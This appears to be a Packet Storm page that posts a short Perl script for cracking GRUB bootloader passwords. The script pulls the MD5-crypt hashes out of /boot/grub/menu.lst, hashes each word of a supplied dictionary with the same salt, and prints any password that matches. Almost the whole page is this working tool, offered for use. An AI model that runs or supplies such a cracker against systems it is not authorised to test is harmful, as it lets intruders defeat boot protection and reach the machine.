This is a GRUB bootloader password cracker. It finds the MD5 hashes in the /boot/grub/menu.lst and when given a dictionary list it does its magic! (needs the passwdmd5 perl module).
ac5ffebfa346a0c505b2b33450e4b194#!/usr/bin/perl
use Crypt::PasswdMD5;
open(FG, "/boot/grub/menu.lst") || die "Problem opening /boot/grub/menu.lst !\n";
for ($count=0, $ct=0; <FG>;){
if (/^title\s+(.+)/) { $title[++$ct]=$1; $tline=$. }
if (/^password --md5 (\S+)/) { $md5hashes[++$count] = $1; $hashline=$. }
if ( $tline+1 == $hashline && $. == $hashline ) { print "MD5crypt hash for $title[$ct]: $md5hashes[$count]\n" }
if ( eof(FG) && $count==0 ) { print "GRUB is not using password authentication!" }
}
close(FG);
print"\n";
open(DC, "$ARGV[0]");
if ($count > 0) { print "Using dictionary $ARGV[0] to crack GRUB passwords...\n\n" }
for($y=1; $y<=$count; $y++){
while ($line=<DC>) {
chomp($line);
if ( $md5hashes[$y] =~ /\$1\$(.....)\$\S+/ ) { $salt=$1; }
$genhash = unix_md5_crypt($line, $salt);
if ( $genhash eq $md5hashes[$y] ) { print "Password for $title[$y+1]: $line \nMD5hash for $title[$y+1]: $md5hashes[$y]\n"; last; }
}
seek(DC,0,0);
}
close(DC);
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!